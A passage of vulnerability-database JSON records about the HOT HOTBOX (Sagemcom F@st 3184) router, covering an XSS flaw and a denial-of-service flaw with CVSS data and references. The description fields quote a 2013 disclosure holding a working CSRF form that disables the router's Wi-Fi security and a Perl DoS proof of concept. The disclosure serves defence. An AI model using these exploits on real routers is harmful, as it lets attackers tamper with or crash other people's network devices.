"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-560"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "HOT HOTBOX Router Vulnerabilities in pre-shared keys in software",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005731"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-560"
}
],
"trust": 0.6
}
}
VAR-201312-0374
Vulnerability from variot - Updated: 2025-04-11 22:48Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. A cross-site scripting vulnerability exists in HOT HOTBOX routers using software version 2.1.11. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+
Vulnerabilities List -
Default WPS Pin
Authentication based on IP Address
DoS via crafted POST
Path/Directory Traversal
Script injection via DHCP request
No CSRF Token
Demo - http://www.youtube.com/watch?v=CPlT09ZIj48
CSRF EXPLOIT:
document.getElementById(1).submit();DENIAL OF SERVICE EXPLOIT:
use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;
Author: Oz Elisyan
Date: 3 September 2013
Affected Version: <= 2.1.11
print "# HOTBOX DoS PoC #\n\n"
unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }
print "Sending Evil POST request...\n";
my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);
print "Done.";
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201312-0374",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "hotbox router",
"scope": "eq",
"trust": 3.0,
"vendor": "hot",
"version": "2.1.11"
},
{
"model": "hotbox router",
"scope": "eq",
"trust": 1.0,
"vendor": "hot",
"version": null
},
{
"model": "hotbox router",
"scope": null,
"trust": 0.8,
"vendor": "hot",
"version": null
},
{
"model": "f@st router",
"scope": "eq",
"trust": 0.3,
"vendor": "sagecom",
"version": "31842.1.11"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00018"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005734"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-563"
},
{
"db": "NVD",
"id": "CVE-2013-5218"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:hot:hotbox_router",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005734"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oz Elisyan",
"sources": [
{
"db": "BID",
"id": "63550"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 0.4
},
"cve": "CVE-2013-5218",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 5.5,
"id": "CVE-2013-5218",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 5.5,
"id": "CNVD-2014-00018",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 5.5,
"id": "VHN-65220",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:A/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-5218",
"trust": 1.0,
"value": "LOW"
},
{
"author": "NVD",
"id": "CVE-2013-5218",
"trust": 0.8,
"value": "Low"
},
{
"author": "CNVD",
"id": "CNVD-2014-00018",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-563",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-65220",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00018"
},
{
"db": "VULHUB",
"id": "VHN-65220"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005734"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-563"
},
{
"db": "NVD",
"id": "CVE-2013-5218"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to inject arbitrary web script or HTML via a crafted DHCP Host Name option, which is not properly handled during rendering of the DHCP table in wlanAccess.asp. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. A cross-site scripting vulnerability exists in HOT HOTBOX routers using software version 2.1.11. +------------------------------------------------------------------------------+\n| HOTBOX is the leading router/modem appliance of |\n| HOT Cable communication company in israel. |\n| The Appliance is manufactured by SAGEMCOM |\n| and carries the model name F@st 3184. |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities |\n+--------------------+---------------------------------------------------------+\n| Release Date | 2013/09/09 |\n| Researcher | Oz Elisyan |\n+--------------------+---------------------------------------------------------+\n| System Affected | HOTBOX Router/Modem |\n| Versions Affected | 2.1.11 , possibly earlier |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, |\n| CVE-2013-5039 |\n| Vendor Patched | N/A |\n| Classification | 0-day |\n| Exploits | http://elisyan.com/hotboxDoS.pl, |\n| http://elisyan.com/hotboxCSRF.html |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5218"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005734"
},
{
"db": "CNVD",
"id": "CNVD-2014-00018"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "VULHUB",
"id": "VHN-65220"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-65220",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65220"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-5218",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "123901",
"trust": 3.2
},
{
"db": "BID",
"id": "63550",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005734",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201312-563",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-00018",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "29518",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-65220",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00018"
},
{
"db": "VULHUB",
"id": "VHN-65220"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005734"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-563"
},
{
"db": "NVD",
"id": "CVE-2013-5218"
}
]
},
"id": "VAR-201312-0374",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00018"
},
{
"db": "VULHUB",
"id": "VHN-65220"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00018"
}
]
},
"last_update_date": "2025-04-11T22:48:26.745000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.hot.net.il/heb/Main/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005734"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65220"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005734"
},
{
"db": "NVD",
"id": "CVE-2013-5218"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
},
{
"trust": 2.4,
"url": "http://www.youtube.com/watch?v=cplt09zij48"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5218"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5218"
},
{
"trust": 0.3,
"url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2013/nov/17"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
},
{
"trust": 0.1,
"url": "http://$host/goform/login\";"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxcsrf.html"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxdos.pl,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00018"
},
{
"db": "VULHUB",
"id": "VHN-65220"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005734"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-563"
},
{
"db": "NVD",
"id": "CVE-2013-5218"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-00018"
},
{
"db": "VULHUB",
"id": "VHN-65220"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005734"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-563"
},
{
"db": "NVD",
"id": "CVE-2013-5218"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00018"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65220"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005734"
},
{
"date": "2013-11-04T13:03:33",
"db": "PACKETSTORM",
"id": "123901"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-563"
},
{
"date": "2013-12-30T04:53:07.287000",
"db": "NVD",
"id": "CVE-2013-5218"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00018"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65220"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005734"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-563"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-5218"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-563"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "HOT HOTBOX Router Software cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005734"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-563"
}
],
"trust": 0.6
}
}
VAR-201312-0376
Vulnerability from variot - Updated: 2025-04-11 22:48goform/login on the HOT HOTBOX router with software 2.1.11 allows remote attackers to cause a denial of service (device crash) via crafted HTTP POST data. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+
Vulnerabilities List -
Default WPS Pin
Authentication based on IP Address
DoS via crafted POST
Path/Directory Traversal
Script injection via DHCP request
No CSRF Token
Demo - http://www.youtube.com/watch?v=CPlT09ZIj48
CSRF EXPLOIT:
document.getElementById(1).submit();DENIAL OF SERVICE EXPLOIT:
use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;
Author: Oz Elisyan
Date: 3 September 2013
Affected Version: <= 2.1.11
print "# HOTBOX DoS PoC #\n\n"
unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }
print "Sending Evil POST request...\n";
my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);
print "Done.";
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201312-0376",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "hotbox router",
"scope": "eq",
"trust": 3.0,
"vendor": "hot",
"version": "2.1.11"
},
{
"model": "hotbox router",
"scope": "eq",
"trust": 1.0,
"vendor": "hot",
"version": null
},
{
"model": "hotbox router",
"scope": null,
"trust": 0.8,
"vendor": "hot",
"version": null
},
{
"model": "f@st router",
"scope": "eq",
"trust": 0.3,
"vendor": "sagecom",
"version": "31842.1.11"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00014"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005736"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-565"
},
{
"db": "NVD",
"id": "CVE-2013-5220"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:hot:hotbox_router",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005736"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oz Elisyan",
"sources": [
{
"db": "BID",
"id": "63550"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 0.4
},
"cve": "CVE-2013-5220",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
